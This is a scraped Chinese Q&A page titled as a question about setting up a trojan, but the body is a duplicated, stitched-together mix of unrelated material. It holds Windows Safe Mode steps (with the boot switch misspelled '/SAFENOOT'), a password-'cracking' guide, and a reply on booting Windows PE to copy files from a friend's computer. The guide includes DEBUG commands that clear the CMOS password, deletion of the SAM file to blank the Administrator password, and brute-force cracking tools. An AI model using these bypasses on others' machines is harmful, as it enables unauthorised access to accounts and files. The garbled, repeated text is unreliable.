四、WindowsXP环境下进入安全模式:1、在计算机开启BIOS加载完之后,迅速按下F8键,在出现的WindowsXP高级选项菜单中选择“安全模式”;2、如果有多系统引导,在选择WindowsXP启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的WindowsXP高级选项菜单中选择“安全模式”。另外一种方式: 1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“Boot.ini”标签;4、选择"/SAFENOOT";5、然后点击“确定”按钮保存退出,重新启动计算机;6、重启之后出现的WindowsXP高级选项菜单和Windows2000的类似,选择“安全模式”即可;7、如果要取消“高级选项菜单”,重复上述1-5步骤,不同的是第4步取消选择"/SAFENOOT"。
在Windows中有一个安全模式,一般情况下我们进入安全模式的时候并不多,如果计算机死机,无法正常的关机和重新启动时,发生这种情况时,可以先进入“安全模式”解决问题后,再进行重新电脑,回到原先使用的操作系统。
下面我们就来了解一下Windows 98、windows 2000和windows XP下安全模式的进入和介绍。
Windows 98下的安全模式
进入windows 98的安全模式很简单,在电脑启动的时候,按住CTRL键直到出现Windows 98启动菜单为止,然后再选择第三项“Safe Mode”,或者电脑启动时,当出现“Starting Windows 98”的时候,迅速按下F8键,也可以在出现的启动菜单中选择第三项“Safe Mode”;如果你的电脑安装了多个操作系统,在选择Windows98启动时,当按下回车键,迅速地按下F8键,这样也会出现启动菜单,选择其中的第三项“Safe Mode”就行了;如果系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态。
通过“安全模式”来进入windows系统是与正常启动进入windows系统是不一样的,它不会加载其它驱动程序或其它应用程序;因此在“安全模式”中,屏幕显示只有16色,而且无法使用光驱及一些周边设备。所以“安全模式”是最基本而安全的启动模式。
在安全模式一起的还有其他一些启动模式,下面就做一些简单的介绍。
1、 Normal
这是正常启动的模式,就想平时启动电脑一样。
2、 Logged
记录启动模式,它会记录windows驱动程序加载是的详细清单,启动结果将会保存在系统磁盘下的的bootlog.txt中。
3、 Step-By-Step Confirmation
启动时会载入Config.sys和Autoexec.bat文件进行一条一条的执行,你可以根据情况来跳过某条命令。
4、 Command Prompt Only
直接载入Config.sys和Autoexec.bat文件后就跳到DOS下。
5、 Safe Mode Command Prompt Only
通过最少的安全模式启动到DOS下,不载入Config.sys和Autoexec.bat文件。
一、Windows95环境下进入安全模式:
1、开启计算机,如果正在运行Windows,请重启计算机;
2、在计算机开启时,请留意观察屏幕,当出现"Starting Windows 95"的时候,按住F5键,这样就能进入安全模式;
3、或者,在计算机开启时,当出现"Starting Windows 95"的时候,迅速按住F8键,在出现的启动菜单中选择第三项"Safe Mode"。
二、Windows98/Me环境下进入安全模式:1、在计算机开启时,按住CTRL键直到出现Windows 98启动菜单为止,选择第三项"Safe Mode"。2、或者,在计算机开启时,当出现"Starting Windows 98"的时候,迅速按下F8键,在出现的启动菜单中选择第三项"Safe Mode"。3、如果有多系统引导,在选择Windows98/Me启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的启动菜单中选择第三项"Safe Mode"另外一种方法:1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“高级”按钮,选择“启用“启动”菜单”;
4、然后点击“确定”按钮保存退出,重新启动计算机;
5、重新启动计算机后,就会出现“启动菜单”,选择第三项"Safe Mode";
6、如果要取消“启动菜单”,重复上述1-4步骤,不同的是第3步取消选择“启用“启动”菜单”。如果以上两个方法都失败了,还可以进行以下操作进入安全模式: 1、确认系统启动首先从软驱开始引导启动,插入一张空白软盘或者非引导盘;2、重新启动计算机,当计算机启动的时候,由于所插入的软盘不是引导盘,此时就会看到一条错误信息"Non-System Disk, please replace the disk and press any key.";3、取出软盘,然后按F8键,就会出现启动菜单,选择"Safe Mode";
三、Windows2000环境下进入安全模式:在启动Windows2000时,当看到白色箭头的进度条,按下F8键,出现Windows2000高级选项菜单,有以下一些选项:安全模式 带网络连接的安全模式 带命令提示行的安全模式 启用启动日志模式 启用VGA模式最近一次的正确配置 目录恢复模式 调试模式 正常启动 其中,安全模式:是启动Windows2000的最低配置的设备驱动程序及服务。带网络连接的安全模式:是启动Windows2000的最低配置的设备驱动程序及服务,加上装载网络所需的驱动程序。带命令提示行的安全模式:这与“安全模式”一样,例外的是,www.rixia.cc启动Cmd.exe而不启动Windows资源管理器。一般情况下选择“安全模式”。
四、WindowsXP环境下进入安全模式:1、在计算机开启BIOS加载完之后,迅速按下F8键,在出现的WindowsXP高级选项菜单中选择“安全模式”;2、如果有多系统引导,在选择WindowsXP启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的WindowsXP高级选项菜单中选择“安全模式”。另外一种方式: 1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“Boot.ini”标签;4、选择"/SAFENOOT";5、然后点击“确定”按钮保存退出,重新启动计算机;6、重启之后出现的WindowsXP高级选项菜单和Windows2000的类似,选择“安全模式”即可;7、如果要取消“高级选项菜单”,重复上述1-5步骤,不同的是第4步取消选择"/SAFENOOT"。
在Windows中有一个安全模式,一般情况下我们进入安全模式的时候并不多,如果计算机死机,无法正常的关机和重新启动时,发生这种情况时,可以先进入“安全模式”解决问题后,再进行重新电脑,回到原先使用的操作系统。
下面我们就来了解一下Windows 98、windows 2000和windows XP下安全模式的进入和介绍。
Windows 98下的安全模式
进入windows 98的安全模式很简单,在电脑启动的时候,按住CTRL键直到出现Windows 98启动菜单为止,然后再选择第三项“Safe Mode”,或者电脑启动时,当出现“Starting Windows 98”的时候,迅速按下F8键,也可以在出现的启动菜单中选择第三项“Safe Mode”;如果你的电脑安装了多个操作系统,在选择Windows98启动时,当按下回车键,迅速地按下F8键,这样也会出现启动菜单,选择其中的第三项“Safe Mode”就行了;如果系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态。
通过“安全模式”来进入windows系统是与正常启动进入windows系统是不一样的,它不会加载其它驱动程序或其它应用程序;因此在“安全模式”中,屏幕显示只有16色,而且无法使用光驱及一些周边设备。所以“安全模式”是最基本而安全的启动模式。
在安全模式一起的还有其他一些启动模式,下面就做一些简单的介绍。
1、 Normal
这是正常启动的模式,就想平时启动电脑一样。
2、 Logged
记录启动模式,它会记录windows驱动程序加载是的详细清单,启动结果将会保存在系统磁盘下的的bootlog.txt中。
3、 Step-By-Step Confirmation
启动时会载入Config.sys和Autoexec.bat文件进行一条一条的执行,你可以根据情况来跳过某条命令。
4、 Command Prompt Only
直接载入Config.sys和Autoexec.bat文件后就跳到DOS下。
5、 Safe Mode Command Prompt Only
通过最少的安全模式启动到DOS下,不载入Config.sys和Autoexec.bat文件。
Windows 2000下的安全模式
进入windows 2000安全模式和win98 的基本差不多,一是自动进入。即当系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态;二是手工启动。用户可以手工强行使用安全模式,方法是在启动计算机过程中按F8键,之后屏幕上会显示一个菜单,可在菜单中选择“安全模式”。
安全模式启动后,会在桌面的四角显示“安全模式”的字样,提示系统现在正处于“安全模式”状态。如果显示驱动已经损坏或设置错误,那Windows 2000就会自动使用VGA模式显示驱动程序,因为这种通用的VGA显示驱动程序基本可以保证系统正常工作。
在windows2000中的启动菜单中,有多个“安全模式”的启动模式,大家可能会有所疑问:菜单中的这么多选项都代表着什么意思?什么情况下选择什么模式呢?下面就介绍这几类模式各自的用处。
回答者:惟独爱华 - 初学弟子 一级 10-28 10:24
修改答复: 惟独爱华,您要修改的答复如下: 积分规则 关闭
一、Windows95环境下进入安全模式:
1、开启计算机,如果正在运行Windows,请重启计算机;
2、在计算机开启时,请留意观察屏幕,当出现"Starting Windows 95"的时候,按住F5键,这样就能进入安全模式;
3、或者,在计算机开启时,当出现"Starting Windows 95"的时候,迅速按住F8键,在出现的启动菜单中选择第三项"Safe Mode"。
二、Windows98/Me环境下进入安全模式:1、在计算机开启时,按住CTRL键直到出现Windows 98启动菜单为止,选择第三项"Safe Mode"。2、或者,在计算机开启时,当出现"Starting Windows 98"的时候,迅速按下F8键,在出现的启动菜单中选择第三项"Safe Mode"。3、如果有多系统引导,在选择Windows98/Me启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的启动菜单中选择第三项"Safe Mode"另外一种方法:1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“高级”按钮,选择“启用“启动”菜单”;
4、然后点击“确定”按钮保存退出,重新启动计算机;
5、重新启动计算机后,就会出现“启动菜单”,选择第三项"Safe Mode";
6、如果要取消“启动菜单”,重复上述1-4步骤,不同的是第3步取消选择“启用“启动”菜单”。如果以上两个方法都失败了,还可以进行以下操作进入安全模式: 1、确认系统启动首先从软驱开始引导启动,插入一张空白软盘或者非引导盘;2、重新启动计算机,当计算机启动的时候,由于所插入的软盘不是引导盘,此时就会看到一条错误信息"Non-System Disk, please replace the disk and press any key.";3、取出软盘,然后按F8键,就会出现启动菜单,选择"Safe Mode";
三、Windows2000环境下进入安全模式:在启动Windows2000时,当看到白色箭头的进度条,按下F8键,出现Windows2000高级选项菜单,有以下一些选项:安全模式 带网络连接的安全模式 带命令提示行的安全模式 启用启动日志模式 启用VGA模式最近一次的正确配置 目录恢复模式 调试模式 正常启动 其中,安全模式:是启动Windows2000的最低配置的设备驱动程序及服务。带网络连接的安全模式:是启动Windows2000的最低配置的设备驱动程序及服务,加上装载网络所需的驱动程序。带命令提示行的安全模式:这与“安全模式”一样,例外的是,启动Cmd.exe而不启动Windows资源管理器。一般情况下选择“安全模式”。
四、WindowsXP环境下进入安全模式:1、在计算机开启BIOS加载完之后,迅速按下F8键,在出现的WindowsXP高级选项菜单中选择“安全模式”;2、如果有多系统引导,在选择WindowsXP启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的WindowsXP高级选项菜单中选择“安全模式”。另外一种方式: 1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“Boot.ini”标签;4、选择"/SAFENOOT";5、然后点击“确定”按钮保存退出,重新启动计算机;6、重启之后出现的WindowsXP高级选项菜单和Windows2000的类似,选择“安全模式”即可;7、如果要取消“高级选项菜单”,重复上述1-5步骤,不同的是第4步取消选择"/SAFENOOT"。
在Windows中有一个安全模式,一般情况下我们进入安全模式的时候并不多,如果计算机死机,无法正常的关机和重新启动时,发生这种情况时,可以先进入“安全模式”解决问题后,再进行重新电脑,回到原先使用的操作系统。
下面我们就来了解一下Windows 98、windows 2000和windows XP下安全模式的进入和介绍。
Windows 98下的安全模式
进入windows 98的安全模式很简单,在电脑启动的时候,按住CTRL键直到出现Windows 98启动菜单为止,然后再选择第三项“Safe Mode”,或者电脑启动时,当出现“Starting Windows 98”的时候,迅速按下F8键,也可以在出现的启动菜单中选择第三项“Safe Mode”;如果你的电脑安装了多个操作系统,在选择Windows98启动时,当按下回车键,迅速地按下F8键,这样也会出现启动菜单,选择其中的第三项“Safe Mode”就行了;如果系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态。
通过“安全模式”来进入windows系统是与正常启动进入windows系统是不一样的,它不会加载其它驱动程序或其它应用程序;因此在“安全模式”中,屏幕显示只有16色,而且无法使用光驱及一些周边设备。所以“安全模式”是最基本而安全的启动模式。
在安全模式一起的还有其他一些启动模式,下面就做一些简单的介绍。
1、 Normal
这是正常启动的模式,就想平时启动电脑一样。
2、 Logged
记录启动模式,它会记录windows驱动程序加载是的详细清单,启动结果将会保存在系统磁盘下的的bootlog.txt中。
3、 Step-By-Step Confirmation
启动时会载入Config.sys和Autoexec.bat文件进行一条一条的执行,你可以根据情况来跳过某条命令。
4、 Command Prompt Only
直接载入Config.sys和Autoexec.bat文件后就跳到DOS下。
5、 Safe Mode Command Prompt Only
通过最少的安全模式启动到DOS下,不载入Config.sys和Autoexec.bat文件。
我们经常要输入各种各样的密码,例如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这些密码,就有可能用不了机器、打不开文件、不能聊天……
也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码的破解方法,希望能解你燃眉之急!
一、遗忘了SYSTEM密码
如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了,解决的办法只能是:打开机箱,把电池取下、正负极短接,给 CMOS 放电,清除CMOS中的所有内容(当然也就包括密码),然后重新开机进行设置。
注意:有些主板设置了CMOS密码清除跳线,请参照主板说明书将该跳线http://www.rixia.cc短接,这样也可以清除CMOS密码。
二、遗忘了SETUP密码
遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG ,然后输入如下命令手工清除SETUP密码:
_ o 70 16
_ o 71 16
_ q
你也可以用CMOS密码破解软件来显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),在DOS下启动该程序,CMOS密码就会显示出来。
三、遗忘了Windows登录密码
WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows 安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个人信息文件,重新启动Windows后,系统会弹出一个不包含任何用户名的密码设置框,此时无需输入任何内容,直接单击“确定”,登录密码即被删除。
另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“0”,然后重新启动Windows也可达到同样目的。
WinXP/2000下对策:删除系统安装目录system32 config下的SAM文件,重新启动,此时管理员Administrator账号已经没有密码了,用Administrator帐户登陆系统,不用输入任何密码,进入系统后再重新设置登陆帐户密码即可。
四、遗忘了Windows屏保密码
解决方法:在开机后按F8键,选择安全模式启动,进入Windows 后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕保护,取消“密码保护”即可。
五、遗忘了Windows电源管理密码
Windows的电源管理功能也可以设置密码,启用此功能后,当系统从节能状态返回时就会要求输入密码。
如果你遗忘了该密码,可以使用前面破解Windows登录密码的那种方法去破解。
下篇六、遗忘了微软Office密码
解决方法:使用破解Office系列文档密码的软件,这样的软件有很多,例如AOPR(下载网址http://www.elcomsoft.com/),该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行搜索。
七、遗忘了WinZip压缩包密码
解决方法:用软件UZPC(Ultra Zip Password Cracker,找回丢失的密码。使用该软件时要先设置适当的解密方式,例如“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等,一般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试,直至找出最后的结果。
八、遗忘了RAR压缩包密码
遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARK RAR压缩包文件名”命令,利用缺省参数即可进行破解。
九、遗忘了QQ/ICQ密码
为保护QQ密码,你应该赶快申请密码保护。假如你忘记了QQ密码、或者密码被盗时,只需填写正确的信息即可取回。
如果你要找回ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久违”的ICQ密码。
十、遗忘了Outlook Express密码
如果你忘了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:重启计算机并按F8,选择“安全模式”,再启动OE就不需要密码了,然后你可以重建一个用户(不能修改密码),把信息导入新用户信箱即可。
十一、遗忘了Foxmail帐户密码
解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新建一个帐户(帐户名任意,例如如lacl1),然后退出Foxmail;运行Windows资源管理器,找到Foxmail\MAIL\lacl1文件夹,里边有个“account.stg”,把它复制到忘记密码的帐户(例如“lacl”)目录中,直接覆盖原来的“account.stg”文件;再重新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐户中原来的邮件一封都不会少!
十二、查看“*”密码
许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到密码的原始字符,如果你使用专门破解“*”密码的软件,即可查出这些密码的原始字符。
这样的软件网上有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用Password Spectator Pro。使用时,只需先打开显示“*”的窗口,启动这类软件,然后按住Ctrl键、在密码栏中按下鼠标左键,这些“*”密码的原始字符就会显示出来了。
也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码的破解方法,希望能解你燃眉之急!
一、遗忘了SYSTEM密码
如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了,解决的办法只能是:打开机箱,把电池取下、正负极短接,给 CMOS 放电,清除CMOS中的所有内容(当然也就包括密码),然后重新开机进行设置。
注意:有些主板设置了CMOS密码清除跳线,请参照主板说明书将该跳线http://www.rixia.cc短接,这样也可以清除CMOS密码。
二、遗忘了SETUP密码
遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG ,然后输入如下命令手工清除SETUP密码:
_ o 70 16
_ o 71 16
_ q
你也可以用CMOS密码破解软件来显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),在DOS下启动该程序,CMOS密码就会显示出来。
三、遗忘了Windows登录密码
WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows 安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个人信息文件,重新启动Windows后,系统会弹出一个不包含任何用户名的密码设置框,此时无需输入任何内容,直接单击“确定”,登录密码即被删除。
另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“0”,然后重新启动Windows也可达到同样目的。
WinXP/2000下对策:删除系统安装目录system32 config下的SAM文件,重新启动,此时管理员Administrator账号已经没有密码了,用Administrator帐户登陆系统,不用输入任何密码,进入系统后再重新设置登陆帐户密码即可。
四、遗忘了Windows屏保密码
解决方法:在开机后按F8键,选择安全模式启动,进入Windows 后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕保护,取消“密码保护”即可。
五、遗忘了Windows电源管理密码
Windows的电源管理功能也可以设置密码,启用此功能后,当系统从节能状态返回时就会要求输入密码。
如果你遗忘了该密码,可以使用前面破解Windows登录密码的那种方法去破解。
下篇六、遗忘了微软Office密码
解决方法:使用破解Office系列文档密码的软件,这样的软件有很多,例如AOPR(下载网址http://www.elcomsoft.com/),该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行搜索。
七、遗忘了WinZip压缩包密码
解决方法:用软件UZPC(Ultra Zip Password Cracker,找回丢失的密码。使用该软件时要先设置适当的解密方式,例如“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等,一般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试,直至找出最后的结果。
八、遗忘了RAR压缩包密码
遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARK RAR压缩包文件名”命令,利用缺省参数即可进行破解。
九、遗忘了QQ/ICQ密码
为保护QQ密码,你应该赶快申请密码保护。假如你忘记了QQ密码、或者密码被盗时,只需填写正确的信息即可取回。
如果你要找回ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久违”的ICQ密码。
十、遗忘了Outlook Express密码
如果你忘了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:重启计算机并按F8,选择“安全模式”,再启动OE就不需要密码了,然后你可以重建一个用户(不能修改密码),把信息导入新用户信箱即可。
十一、遗忘了Foxmail帐户密码
解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新建一个帐户(帐户名任意,例如如lacl1),然后退出Foxmail;运行Windows资源管理器,找到Foxmail\MAIL\lacl1文件夹,里边有个“account.stg”,把它复制到忘记密码的帐户(例如“lacl”)目录中,直接覆盖原来的“account.stg”文件;再重新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐户中原来的邮件一封都不会少!
十二、查看“*”密码
许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到密码的原始字符,如果你使用专门破解“*”密码的软件,即可查出这些密码的原始字符。
这样的软件网上有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用Password Spectator Pro。使用时,只需先打开显示“*”的窗口,启动这类软件,然后按住Ctrl键、在密码栏中按下鼠标左键,这些“*”密码的原始字符就会显示出来了。
叫你一招简单,容易实行的,买张windows PE(光盘系统)有些系统安装盘也带,把它放进光驱引导进入光盘系统,里面是可以用鼠标的,打开你朋友电脑的C盘的:Documents and Settings文件夹中以你朋友平常使用的那个帐号命名的文件夹进入就可以看到“桌面”这个文件夹了,里面就是你要的东西,复制到其它盘就行了。
LZ这个简单吧。以前都是这样跟别人做的,呵呵。
这个不用DOS,也没有文简单易行,呵呵,也不用你去破解密码,那太麻烦了。
LZ这个简单吧。以前都是这样跟别人做的,呵呵。
这个不用DOS,也没有文简单易行,呵呵,也不用你去破解密码,那太麻烦了。
这是中了前段时间流行的加密病毒,需要制作U盘启动器或者电脑装机系统盘来破解开机密码
解决办法
1.如果有装机系统盘后,将光盘放入光驱,重启电脑就有一个【清除开机密码】选择清除后正常重启电脑即可。
2.如果没有装机盘的话,可以拿U盘到附近有网络的地方,然后到腾讯电脑管家官网下载一个电脑管家,然后通过电脑管家——软件管理——软件仓库——右上角搜索【U盘启动】制作一个U盘启动器,然后将U盘连接到底电脑上,重启按F12选择从USB启动,清除开机密码即可。
解决办法
1.如果有装机系统盘后,将光盘放入光驱,重启电脑就有一个【清除开机密码】选择清除后正常重启电脑即可。
2.如果没有装机盘的话,可以拿U盘到附近有网络的地方,然后到腾讯电脑管家官网下载一个电脑管家,然后通过电脑管家——软件管理——软件仓库——右上角搜索【U盘启动】制作一个U盘启动器,然后将U盘连接到底电脑上,重启按F12选择从USB启动,清除开机密码即可。
文章标签:
本文标题: 要如何在自己的电脑上创建或配置一个木马?
本文地址: http://www.rixia.cc/wenda/73185.html
上一篇:牡丹花素描怎么画
相关推荐